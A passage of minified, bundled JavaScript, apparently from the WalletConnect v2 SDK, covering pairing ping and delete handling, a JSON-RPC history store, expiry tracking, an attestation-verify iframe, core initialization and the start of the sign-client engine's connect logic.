            const { topic: s, payload: n } = i, a = (await this.core.history.get(s, n.id)).request.method;
            switch(a){
                case "wc_pairingPing":
                    return this.onPairingPingResponse(s, n);
                default:
                    return this.onUnknownRpcMethodResponse(a);
            }
        }, this.onPairingPingRequest = async (i, s)=>{
            const { id: n } = s;
            try {
                this.isValidPing({
                    topic: i
                }), await this.sendResult(n, i, !0), this.events.emit("pairing_ping", {
                    id: n,
                    topic: i
                });
            } catch (a) {
                await this.sendError(n, i, a), this.logger.error(a);
            }
        }, this.onPairingPingResponse = (i, s)=>{
            const { id: n } = s;
            setTimeout(()=>{
                (0, $2e45abd1d679ec32$export$cb3d3b20e3223d77)(s) ? this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("pairing_ping", n), {}) : (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(s) && this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("pairing_ping", n), {
                    error: s.error
                });
            }, 500);
        }, this.onPairingDeleteRequest = async (i, s)=>{
            const { id: n } = s;
            try {
                this.isValidDisconnect({
                    topic: i
                }), await this.deletePairing(i), this.events.emit("pairing_delete", {
                    id: n,
                    topic: i
                });
            } catch (a) {
                await this.sendError(n, i, a), this.logger.error(a);
            }
        }, this.onUnknownRpcMethodRequest = async (i, s)=>{
            const { id: n, method: a } = s;
            try {
                if (this.registeredMethods.includes(a)) return;
                const o = (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("WC_METHOD_UNSUPPORTED", a);
                await this.sendError(n, i, o), this.logger.error(o);
            } catch (o) {
                await this.sendError(n, i, o), this.logger.error(o);
            }
        }, this.onUnknownRpcMethodResponse = (i)=>{
            this.registeredMethods.includes(i) || this.logger.error((0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("WC_METHOD_UNSUPPORTED", i));
        }, this.isValidPair = (i)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(i)) {
                const { message: s } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `pair() params: ${i}`);
                throw new Error(s);
            }
            if (!(0, $a5d33cfc7f8e5437$export$bef94a5618bf18bf)(i.uri)) {
                const { message: s } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `pair() uri: ${i.uri}`);
                throw new Error(s);
            }
        }, this.isValidPing = async (i)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(i)) {
                const { message: n } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `ping() params: ${i}`);
                throw new Error(n);
            }
            const { topic: s } = i;
            await this.isValidPairingTopic(s);
        }, this.isValidDisconnect = async (i)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(i)) {
                const { message: n } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `disconnect() params: ${i}`);
                throw new Error(n);
            }
            const { topic: s } = i;
            await this.isValidPairingTopic(s);
        }, this.isValidPairingTopic = async (i)=>{
            if (!(0, $a5d33cfc7f8e5437$export$ee898ca48ab56c74)(i, !1)) {
                const { message: s } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `pairing topic should be a string: ${i}`);
                throw new Error(s);
            }
            if (!this.pairings.keys.includes(i)) {
                const { message: s } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `pairing topic doesn't exist: ${i}`);
                throw new Error(s);
            }
            if ((0, $a5d33cfc7f8e5437$export$57947cfd429801a2)(this.pairings.get(i).expiry)) {
                await this.deletePairing(i);
                const { message: s } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("EXPIRED", `pairing topic: ${i}`);
                throw new Error(s);
            }
        }, this.core = e, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name), this.pairings = new $e9e439c110f17033$export$390f32400eaf98c9(this.core, this.logger, this.name, this.storagePrefix);
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
    registerRelayerEvents() {
        this.core.relayer.on($e9e439c110f17033$export$d56245796e2837d.message, async (e)=>{
            const { topic: t, message: i } = e;
            if (!this.pairings.keys.includes(t) || this.ignoredPayloadTypes.includes(this.core.crypto.getPayloadType(i))) return;
            const s = await this.core.crypto.decode(t, i);
            try {
                (0, $2e45abd1d679ec32$export$f6e4034abe07d2a5)(s) ? (this.core.history.set(t, s), this.onRelayEventRequest({
                    topic: t,
                    payload: s
                })) : (0, $2e45abd1d679ec32$export$308ba927de2bcbe8)(s) && (await this.core.history.resolve(s), await this.onRelayEventResponse({
                    topic: t,
                    payload: s
                }), this.core.history.delete(t, s.id));
            } catch (n) {
                this.logger.error(n);
            }
        });
    }
    registerExpirerEvents() {
        this.core.expirer.on($e9e439c110f17033$export$9013719d9206b0c1.expired, async (e)=>{
            const { topic: t } = (0, $a5d33cfc7f8e5437$export$93adeb0f16e8e51d)(e.target);
            t && this.pairings.keys.includes(t) && (await this.deletePairing(t, !0), this.events.emit("pairing_expire", {
                topic: t
            }));
        });
    }
}
class $e9e439c110f17033$export$eeb4f10f25d479cb extends (0, $bace94c1ef08d1bc$export$45b2c2643615b67) {
    constructor(e, t){
        super(e, t), this.core = e, this.logger = t, this.records = new Map, this.events = new (0, $7etJZ.EventEmitter), this.name = $e9e439c110f17033$export$160142c73cb99dc3, this.version = $e9e439c110f17033$export$8eba9ce85616c607, this.cached = [], this.initialized = !1, this.storagePrefix = $e9e439c110f17033$export$f258d29ae5e3d545, this.init = async ()=>{
            this.initialized || (this.logger.trace("Initialized"), await this.restore(), this.cached.forEach((i)=>this.records.set(i.id, i)), this.cached = [], this.registerEventListeners(), this.initialized = !0);
        }, this.set = (i, s, n)=>{
            if (this.isInitialized(), this.logger.debug("Setting JSON-RPC request history record"), this.logger.trace({
                type: "method",
                method: "set",
                topic: i,
                request: s,
                chainId: n
            }), this.records.has(s.id)) return;
            const a = {
                id: s.id,
                topic: i,
                request: {
                    method: s.method,
                    params: s.params || null
                },
                chainId: n,
                expiry: (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)((0, $aG48A.THIRTY_DAYS))
            };
            this.records.set(a.id, a), this.events.emit($e9e439c110f17033$export$a682338b5ffca937.created, a);
        }, this.resolve = async (i)=>{
            if (this.isInitialized(), this.logger.debug("Updating JSON-RPC response history record"), this.logger.trace({
                type: "method",
                method: "update",
                response: i
            }), !this.records.has(i.id)) return;
            const s = await this.getRecord(i.id);
            typeof s.response > "u" && (s.response = (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(i) ? {
                error: i.error
            } : {
                result: i.result
            }, this.records.set(s.id, s), this.events.emit($e9e439c110f17033$export$a682338b5ffca937.updated, s));
        }, this.get = async (i, s)=>(this.isInitialized(), this.logger.debug("Getting record"), this.logger.trace({
                type: "method",
                method: "get",
                topic: i,
                id: s
            }), await this.getRecord(s)), this.delete = (i, s)=>{
            this.isInitialized(), this.logger.debug("Deleting record"), this.logger.trace({
                type: "method",
                method: "delete",
                id: s
            }), this.values.forEach((n)=>{
                if (n.topic === i) {
                    if (typeof s < "u" && n.id !== s) return;
                    this.records.delete(n.id), this.events.emit($e9e439c110f17033$export$a682338b5ffca937.deleted, n);
                }
            });
        }, this.exists = async (i, s)=>(this.isInitialized(), this.records.has(s) ? (await this.getRecord(s)).topic === i : !1), this.on = (i, s)=>{
            this.events.on(i, s);
        }, this.once = (i, s)=>{
            this.events.once(i, s);
        }, this.off = (i, s)=>{
            this.events.off(i, s);
        }, this.removeListener = (i, s)=>{
            this.events.removeListener(i, s);
        }, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name);
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    get storageKey() {
        return this.storagePrefix + this.version + "//" + this.name;
    }
    get size() {
        return this.records.size;
    }
    get keys() {
        return Array.from(this.records.keys());
    }
    get values() {
        return Array.from(this.records.values());
    }
    get pending() {
        const e = [];
        return this.values.forEach((t)=>{
            if (typeof t.response < "u") return;
            const i = {
                topic: t.topic,
                request: (0, $3bb3ddc7bbc938cc$export$11d081ebb32d4398)(t.request.method, t.request.params, t.id),
                chainId: t.chainId
            };
            return e.push(i);
        }), e;
    }
    async setJsonRpcRecords(e) {
        await this.core.storage.setItem(this.storageKey, e);
    }
    async getJsonRpcRecords() {
        return await this.core.storage.getItem(this.storageKey);
    }
    getRecord(e) {
        this.isInitialized();
        const t = this.records.get(e);
        if (!t) {
            const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `${this.name}: ${e}`);
            throw new Error(i);
        }
        return t;
    }
    async persist() {
        await this.setJsonRpcRecords(this.values), this.events.emit($e9e439c110f17033$export$a682338b5ffca937.sync);
    }
    async restore() {
        try {
            const e = await this.getJsonRpcRecords();
            if (typeof e > "u" || !e.length) return;
            if (this.records.size) {
                const { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("RESTORE_WILL_OVERRIDE", this.name);
                throw this.logger.error(t), new Error(t);
            }
            this.cached = e, this.logger.debug(`Successfully Restored records for ${this.name}`), this.logger.trace({
                type: "method",
                method: "restore",
                records: this.values
            });
        } catch (e) {
            this.logger.debug(`Failed to Restore records for ${this.name}`), this.logger.error(e);
        }
    }
    registerEventListeners() {
        this.events.on($e9e439c110f17033$export$a682338b5ffca937.created, (e)=>{
            const t = $e9e439c110f17033$export$a682338b5ffca937.created;
            this.logger.info(`Emitting ${t}`), this.logger.debug({
                type: "event",
                event: t,
                record: e
            }), this.persist();
        }), this.events.on($e9e439c110f17033$export$a682338b5ffca937.updated, (e)=>{
            const t = $e9e439c110f17033$export$a682338b5ffca937.updated;
            this.logger.info(`Emitting ${t}`), this.logger.debug({
                type: "event",
                event: t,
                record: e
            }), this.persist();
        }), this.events.on($e9e439c110f17033$export$a682338b5ffca937.deleted, (e)=>{
            const t = $e9e439c110f17033$export$a682338b5ffca937.deleted;
            this.logger.info(`Emitting ${t}`), this.logger.debug({
                type: "event",
                event: t,
                record: e
            }), this.persist();
        }), this.core.heartbeat.on((0, $212993b948b3fe4b$exports.HEARTBEAT_EVENTS).pulse, ()=>{
            this.cleanup();
        });
    }
    cleanup() {
        try {
            this.records.forEach((e)=>{
                (0, $aG48A.toMiliseconds)(e.expiry || 0) - Date.now() <= 0 && (this.logger.info(`Deleting expired history log: ${e.id}`), this.delete(e.topic, e.id));
            });
        } catch (e) {
            this.logger.warn(e);
        }
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
}
class $e9e439c110f17033$export$e76805ce609031cb extends (0, $bace94c1ef08d1bc$export$41aaa3c39f6f2861) {
    constructor(e, t){
        super(e, t), this.core = e, this.logger = t, this.expirations = new Map, this.events = new (0, $7etJZ.EventEmitter), this.name = $e9e439c110f17033$export$4ddf883392bbc828, this.version = $e9e439c110f17033$export$717295846191925d, this.cached = [], this.initialized = !1, this.storagePrefix = $e9e439c110f17033$export$f258d29ae5e3d545, this.init = async ()=>{
            this.initialized || (this.logger.trace("Initialized"), await this.restore(), this.cached.forEach((i)=>this.expirations.set(i.target, i)), this.cached = [], this.registerEventListeners(), this.initialized = !0);
        }, this.has = (i)=>{
            try {
                const s = this.formatTarget(i);
                return typeof this.getExpiration(s) < "u";
            } catch  {
                return !1;
            }
        }, this.set = (i, s)=>{
            this.isInitialized();
            const n = this.formatTarget(i), a = {
                target: n,
                expiry: s
            };
            this.expirations.set(n, a), this.checkExpiry(n, a), this.events.emit($e9e439c110f17033$export$9013719d9206b0c1.created, {
                target: n,
                expiration: a
            });
        }, this.get = (i)=>{
            this.isInitialized();
            const s = this.formatTarget(i);
            return this.getExpiration(s);
        }, this.del = (i)=>{
            if (this.isInitialized(), this.has(i)) {
                const s = this.formatTarget(i), n = this.getExpiration(s);
                this.expirations.delete(s), this.events.emit($e9e439c110f17033$export$9013719d9206b0c1.deleted, {
                    target: s,
                    expiration: n
                });
            }
        }, this.on = (i, s)=>{
            this.events.on(i, s);
        }, this.once = (i, s)=>{
            this.events.once(i, s);
        }, this.off = (i, s)=>{
            this.events.off(i, s);
        }, this.removeListener = (i, s)=>{
            this.events.removeListener(i, s);
        }, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name);
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    get storageKey() {
        return this.storagePrefix + this.version + "//" + this.name;
    }
    get length() {
        return this.expirations.size;
    }
    get keys() {
        return Array.from(this.expirations.keys());
    }
    get values() {
        return Array.from(this.expirations.values());
    }
    formatTarget(e) {
        if (typeof e == "string") return (0, $a5d33cfc7f8e5437$export$43ab92477f8713b9)(e);
        if (typeof e == "number") return (0, $a5d33cfc7f8e5437$export$bd13103c2e5cc0c3)(e);
        const { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("UNKNOWN_TYPE", `Target type: ${typeof e}`);
        throw new Error(t);
    }
    async setExpirations(e) {
        await this.core.storage.setItem(this.storageKey, e);
    }
    async getExpirations() {
        return await this.core.storage.getItem(this.storageKey);
    }
    async persist() {
        await this.setExpirations(this.values), this.events.emit($e9e439c110f17033$export$9013719d9206b0c1.sync);
    }
    async restore() {
        try {
            const e = await this.getExpirations();
            if (typeof e > "u" || !e.length) return;
            if (this.expirations.size) {
                const { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("RESTORE_WILL_OVERRIDE", this.name);
                throw this.logger.error(t), new Error(t);
            }
            this.cached = e, this.logger.debug(`Successfully Restored expirations for ${this.name}`), this.logger.trace({
                type: "method",
                method: "restore",
                expirations: this.values
            });
        } catch (e) {
            this.logger.debug(`Failed to Restore expirations for ${this.name}`), this.logger.error(e);
        }
    }
    getExpiration(e) {
        const t = this.expirations.get(e);
        if (!t) {
            const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `${this.name}: ${e}`);
            throw this.logger.error(i), new Error(i);
        }
        return t;
    }
    checkExpiry(e, t) {
        const { expiry: i } = t;
        (0, $aG48A.toMiliseconds)(i) - Date.now() <= 0 && this.expire(e, t);
    }
    expire(e, t) {
        this.expirations.delete(e), this.events.emit($e9e439c110f17033$export$9013719d9206b0c1.expired, {
            target: e,
            expiration: t
        });
    }
    checkExpirations() {
        this.core.relayer.connected && this.expirations.forEach((e, t)=>this.checkExpiry(t, e));
    }
    registerEventListeners() {
        this.core.heartbeat.on((0, $212993b948b3fe4b$exports.HEARTBEAT_EVENTS).pulse, ()=>this.checkExpirations()), this.events.on($e9e439c110f17033$export$9013719d9206b0c1.created, (e)=>{
            const t = $e9e439c110f17033$export$9013719d9206b0c1.created;
            this.logger.info(`Emitting ${t}`), this.logger.debug({
                type: "event",
                event: t,
                data: e
            }), this.persist();
        }), this.events.on($e9e439c110f17033$export$9013719d9206b0c1.expired, (e)=>{
            const t = $e9e439c110f17033$export$9013719d9206b0c1.expired;
            this.logger.info(`Emitting ${t}`), this.logger.debug({
                type: "event",
                event: t,
                data: e
            }), this.persist();
        }), this.events.on($e9e439c110f17033$export$9013719d9206b0c1.deleted, (e)=>{
            const t = $e9e439c110f17033$export$9013719d9206b0c1.deleted;
            this.logger.info(`Emitting ${t}`), this.logger.debug({
                type: "event",
                event: t,
                data: e
            }), this.persist();
        });
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
}
class $e9e439c110f17033$export$91a8e56769aeb334 extends (0, $bace94c1ef08d1bc$export$873b0b865d85ddb6) {
    constructor(e, t){
        super(e, t), this.projectId = e, this.logger = t, this.name = $e9e439c110f17033$export$3b58f2450f2297e3, this.initialized = !1, this.init = async (i)=>{
            (0, $a5d33cfc7f8e5437$export$f7a1e23e542d38e3)() || !(0, $a5d33cfc7f8e5437$export$4e09c449d6c407f7)() || (this.verifyUrl = i?.verifyUrl || $e9e439c110f17033$export$7e3b1a28ddecdbaa, await this.createIframe());
        }, this.register = async (i)=>{
            var s;
            if (this.initialized || await this.init(), !!this.iframe) try {
                (s = this.iframe.contentWindow) == null || s.postMessage(i.attestationId, this.verifyUrl), this.logger.info(`postMessage sent: ${i.attestationId} ${this.verifyUrl}`);
            } catch  {}
        }, this.resolve = async (i)=>{
            var s;
            if (this.isDevEnv) return "";
            this.logger.info(`resolving attestation: ${i.attestationId}`);
            const n = this.startAbortTimer((0, $aG48A.FIVE_SECONDS)), a = await fetch(`${this.verifyUrl}/attestation/${i.attestationId}`, {
                signal: this.abortController.signal
            });
            return clearTimeout(n), a.status === 200 ? (s = await a.json()) == null ? void 0 : s.origin : "";
        }, this.createIframe = async ()=>{
            try {
                await Promise.race([
                    new Promise((i, s)=>{
                        if (document.getElementById($e9e439c110f17033$export$3b58f2450f2297e3)) return i();
                        const n = document.createElement("iframe");
                        n.setAttribute("id", $e9e439c110f17033$export$3b58f2450f2297e3), n.setAttribute("src", `${this.verifyUrl}/${this.projectId}`), n.style.display = "none", n.addEventListener("load", ()=>{
                            this.initialized = !0, i();
                        }), n.addEventListener("error", (a)=>{
                            s(a);
                        }), document.body.append(n), this.iframe = n;
                    }),
                    new Promise((i)=>{
                        setTimeout(()=>i("iframe load timeout"), (0, $aG48A.toMiliseconds)((0, $aG48A.ONE_SECOND) / 2));
                    })
                ]);
            } catch (i) {
                this.logger.error(`Verify iframe failed to load: ${this.verifyUrl}`), this.logger.error(i);
            }
        }, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name), this.verifyUrl = $e9e439c110f17033$export$7e3b1a28ddecdbaa, this.abortController = new AbortController, this.isDevEnv = (0, $a5d33cfc7f8e5437$export$8ee0fc9ee280b4ee)() && undefined;
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    startAbortTimer(e) {
        return setTimeout(()=>this.abortController.abort(), (0, $aG48A.toMiliseconds)(e));
    }
}
var $e9e439c110f17033$var$_r = Object.defineProperty, $e9e439c110f17033$var$Mt = Object.getOwnPropertySymbols, $e9e439c110f17033$var$Rr = Object.prototype.hasOwnProperty, $e9e439c110f17033$var$Tr = Object.prototype.propertyIsEnumerable, $e9e439c110f17033$var$Kt = (r, e, t)=>e in r ? $e9e439c110f17033$var$_r(r, e, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: t
    }) : r[e] = t, $e9e439c110f17033$var$kt = (r, e)=>{
    for(var t in e || (e = {}))$e9e439c110f17033$var$Rr.call(e, t) && $e9e439c110f17033$var$Kt(r, t, e[t]);
    if ($e9e439c110f17033$var$Mt) for (var t of $e9e439c110f17033$var$Mt(e))$e9e439c110f17033$var$Tr.call(e, t) && $e9e439c110f17033$var$Kt(r, t, e[t]);
    return r;
};
class $e9e439c110f17033$export$2e2bcd8739ae039 extends (0, $bace94c1ef08d1bc$export$ed533416df113881) {
    constructor(e){
        super(e), this.protocol = $e9e439c110f17033$export$51b1c900ac262bdf, this.version = $e9e439c110f17033$export$f30bd3c8747cdfbe, this.name = $e9e439c110f17033$export$d47601f9de5ee22b, this.events = new (0, $7etJZ.EventEmitter), this.initialized = !1, this.on = (i, s)=>this.events.on(i, s), this.once = (i, s)=>this.events.once(i, s), this.off = (i, s)=>this.events.off(i, s), this.removeListener = (i, s)=>this.events.removeListener(i, s), this.projectId = e?.projectId, this.relayUrl = e?.relayUrl || $e9e439c110f17033$export$a68061e6c48f332a;
        const t = typeof e?.logger < "u" && typeof e?.logger != "string" ? e.logger : (0, $7fc0ce2591a9daef$exports.pino)((0, $7fc0ce2591a9daef$exports.getDefaultLoggerOptions)({
            level: e?.logger || $e9e439c110f17033$export$db0fdb6d486555c2.logger
        }));
        this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name), this.heartbeat = new (0, $212993b948b3fe4b$exports.HeartBeat), this.crypto = new $e9e439c110f17033$export$8ac8b6291b7ccf24(this, this.logger, e?.keychain), this.history = new $e9e439c110f17033$export$eeb4f10f25d479cb(this, this.logger), this.expirer = new $e9e439c110f17033$export$e76805ce609031cb(this, this.logger), this.storage = e != null && e.storage ? e.storage : new (0, (/*@__PURE__*/$parcel$interopDefault($62fc2f1c5fb46a11$exports)))($e9e439c110f17033$var$kt($e9e439c110f17033$var$kt({}, $e9e439c110f17033$export$ba920abfe854b85d), e?.storageOptions)), this.relayer = new $e9e439c110f17033$export$70e73aa29a3d4407({
            core: this,
            logger: this.logger,
            relayUrl: this.relayUrl,
            projectId: this.projectId
        }), this.pairing = new $e9e439c110f17033$export$3370ee24730992a3(this, this.logger), this.verify = new $e9e439c110f17033$export$91a8e56769aeb334(this.projectId || "", this.logger);
    }
    static async init(e) {
        const t = new $e9e439c110f17033$export$2e2bcd8739ae039(e);
        await t.initialize();
        const i = await t.crypto.getClientId();
        return await t.storage.setItem($e9e439c110f17033$export$9e4ca561755938da, i), t;
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    async start() {
        this.initialized || await this.initialize();
    }
    async initialize() {
        this.logger.trace("Initialized");
        try {
            await this.crypto.init(), await this.history.init(), await this.expirer.init(), await this.relayer.init(), await this.heartbeat.init(), await this.pairing.init(), this.initialized = !0, this.logger.info("Core Initialization Success");
        } catch (e) {
            throw this.logger.warn(`Core Initialization Failure at epoch ${Date.now()}`, e), this.logger.error(e.message), e;
        }
    }
}
const $e9e439c110f17033$export$4143ab5b91744744 = $e9e439c110f17033$export$2e2bcd8739ae039;






var $7etJZ = parcelRequire("7etJZ");

var $aG48A = parcelRequire("aG48A");

const $4a472e843fedf2e2$export$4fa962fc67384e02 = "wc", $4a472e843fedf2e2$export$61085c48796ff049 = 2, $4a472e843fedf2e2$export$94715592c220319a = "client", $4a472e843fedf2e2$export$7fa6f9ee1e2cab96 = `${$4a472e843fedf2e2$export$4fa962fc67384e02}@${$4a472e843fedf2e2$export$61085c48796ff049}:${$4a472e843fedf2e2$export$94715592c220319a}:`, $4a472e843fedf2e2$export$8dffb3242f2c5f72 = {
    name: $4a472e843fedf2e2$export$94715592c220319a,
    logger: "error",
    controller: !1,
    relayUrl: "wss://relay.walletconnect.com"
}, $4a472e843fedf2e2$export$fb2c3ad2a2bc26e9 = {
    session_proposal: "session_proposal",
    session_update: "session_update",
    session_extend: "session_extend",
    session_ping: "session_ping",
    session_delete: "session_delete",
    session_expire: "session_expire",
    session_request: "session_request",
    session_request_sent: "session_request_sent",
    session_event: "session_event",
    proposal_expire: "proposal_expire"
}, $4a472e843fedf2e2$export$2e2bb8505f95527b = {
    database: ":memory:"
}, $4a472e843fedf2e2$export$a26ccd6441b7d638 = "WALLETCONNECT_DEEPLINK_CHOICE", $4a472e843fedf2e2$export$a682338b5ffca937 = {
    created: "history_created",
    updated: "history_updated",
    deleted: "history_deleted",
    sync: "history_sync"
}, $4a472e843fedf2e2$export$160142c73cb99dc3 = "history", $4a472e843fedf2e2$export$8eba9ce85616c607 = "0.3", $4a472e843fedf2e2$export$ae6c7a4f7ed730a1 = "proposal", $4a472e843fedf2e2$export$6db28e89b135a53c = (0, $aG48A.THIRTY_DAYS), $4a472e843fedf2e2$export$1e6a4dc5172f4830 = "Proposal expired", $4a472e843fedf2e2$export$a069e98a8dfeec1e = "session", $4a472e843fedf2e2$export$84b1b9dbcdea0475 = (0, $aG48A.SEVEN_DAYS), $4a472e843fedf2e2$export$2db42d5151ad6eb8 = "engine", $4a472e843fedf2e2$export$4edb1ca37014192d = {
    wc_sessionPropose: {
        req: {
            ttl: (0, $aG48A.FIVE_MINUTES),
            prompt: !0,
            tag: 1100
        },
        res: {
            ttl: (0, $aG48A.FIVE_MINUTES),
            prompt: !1,
            tag: 1101
        }
    },
    wc_sessionSettle: {
        req: {
            ttl: (0, $aG48A.FIVE_MINUTES),
            prompt: !1,
            tag: 1102
        },
        res: {
            ttl: (0, $aG48A.FIVE_MINUTES),
            prompt: !1,
            tag: 1103
        }
    },
    wc_sessionUpdate: {
        req: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 1104
        },
        res: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 1105
        }
    },
    wc_sessionExtend: {
        req: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 1106
        },
        res: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 1107
        }
    },
    wc_sessionRequest: {
        req: {
            ttl: (0, $aG48A.FIVE_MINUTES),
            prompt: !0,
            tag: 1108
        },
        res: {
            ttl: (0, $aG48A.FIVE_MINUTES),
            prompt: !1,
            tag: 1109
        }
    },
    wc_sessionEvent: {
        req: {
            ttl: (0, $aG48A.FIVE_MINUTES),
            prompt: !0,
            tag: 1110
        },
        res: {
            ttl: (0, $aG48A.FIVE_MINUTES),
            prompt: !1,
            tag: 1111
        }
    },
    wc_sessionDelete: {
        req: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 1112
        },
        res: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 1113
        }
    },
    wc_sessionPing: {
        req: {
            ttl: (0, $aG48A.THIRTY_SECONDS),
            prompt: !1,
            tag: 1114
        },
        res: {
            ttl: (0, $aG48A.THIRTY_SECONDS),
            prompt: !1,
            tag: 1115
        }
    }
}, $4a472e843fedf2e2$export$409f0c0a13a1b7c6 = {
    min: (0, $aG48A.FIVE_MINUTES),
    max: (0, $aG48A.SEVEN_DAYS)
}, $4a472e843fedf2e2$export$a8430bf2cf90f262 = {
    idle: "idle",
    active: "active"
}, $4a472e843fedf2e2$export$40b296af21bd38a4 = "request", $4a472e843fedf2e2$export$63c37d8ae5931ad5 = [
    "wc_sessionPropose",
    "wc_sessionRequest",
    "wc_authRequest"
];
var $4a472e843fedf2e2$var$ts = Object.defineProperty, $4a472e843fedf2e2$var$is = Object.defineProperties, $4a472e843fedf2e2$var$rs = Object.getOwnPropertyDescriptors, $4a472e843fedf2e2$var$le = Object.getOwnPropertySymbols, $4a472e843fedf2e2$var$ns = Object.prototype.hasOwnProperty, $4a472e843fedf2e2$var$os = Object.prototype.propertyIsEnumerable, $4a472e843fedf2e2$var$pe = (d, r, e)=>r in d ? $4a472e843fedf2e2$var$ts(d, r, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: e
    }) : d[r] = e, $4a472e843fedf2e2$var$w = (d, r)=>{
    for(var e in r || (r = {}))$4a472e843fedf2e2$var$ns.call(r, e) && $4a472e843fedf2e2$var$pe(d, e, r[e]);
    if ($4a472e843fedf2e2$var$le) for (var e of $4a472e843fedf2e2$var$le(r))$4a472e843fedf2e2$var$os.call(r, e) && $4a472e843fedf2e2$var$pe(d, e, r[e]);
    return d;
}, $4a472e843fedf2e2$var$F = (d, r)=>$4a472e843fedf2e2$var$is(d, $4a472e843fedf2e2$var$rs(r));
class $4a472e843fedf2e2$var$as extends (0, $bace94c1ef08d1bc$export$87df43c730effa30) {
    constructor(r){
        super(r), this.name = $4a472e843fedf2e2$export$2db42d5151ad6eb8, this.events = new (0, (/*@__PURE__*/$parcel$interopDefault($7etJZ))), this.initialized = !1, this.ignoredPayloadTypes = [
            (0, $a5d33cfc7f8e5437$export$406e97c329f0f3d4)
        ], this.requestQueue = {
            state: $4a472e843fedf2e2$export$a8430bf2cf90f262.idle,
            requests: []
        }, this.requestQueueDelay = (0, $aG48A.ONE_SECOND), this.init = async ()=>{
            this.initialized || (await this.cleanup(), this.registerRelayerEvents(), this.registerExpirerEvents(), this.client.core.pairing.register({
                methods: Object.keys($4a472e843fedf2e2$export$4edb1ca37014192d)
            }), this.initialized = !0, setTimeout(()=>{
                this.requestQueue.requests = this.getPendingSessionRequests(), this.processRequestQueue();
            }, (0, $aG48A.toMiliseconds)(this.requestQueueDelay)));
        }, this.connect = async (e)=>{
            this.isInitialized();
            const s = $4a472e843fedf2e2$var$F($4a472e843fedf2e2$var$w({}, e), {
                requiredNamespaces: e.requiredNamespaces || {},
                optionalNamespaces: e.optionalNamespaces || {}
            });
            await this.isValidConnect(s);
            const { pairingTopic: t, requiredNamespaces: i, optionalNamespaces: n, sessionProperties: o, relays: a } = s;
            let l = t, h, I = !1;
            if (l && (I = this.client.core.pairing.pairings.get(l).active), !l || !I) {
                const { topic: f, uri: y } = await this.client.core.pairing.create();
                l = f, h = y;
            }
            const g = await this.client.core.crypto.generateKeyPair(), E = $4a472e843fedf2e2$var$w({
                requiredNamespaces: i,
                optionalNamespaces: n,
                relays: a ?? [
                    {
                        protocol: (0, $e9e439c110f17033$export$822d0bd1635d5360)
                    }
                ],
                proposer: {
                    publicKey: g,
                    metadata: this.client.metadata
                }
            }, o && {
                sessionProperties: o
            }), { reject: u, resolve: T, done: K } = (0, $a5d33cfc7f8e5437$export$cbf9e3cc9ffc85cb)((0, $aG48A.FIVE_MINUTES), $4a472e843fedf2e2$export$1e6a4dc5172f4830);
            if (this.events.once((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_connect"), async ({ error: f, session: y })=>{
                if (f) u(f);
                else if (y) {
                    y.self.publicKey = g;
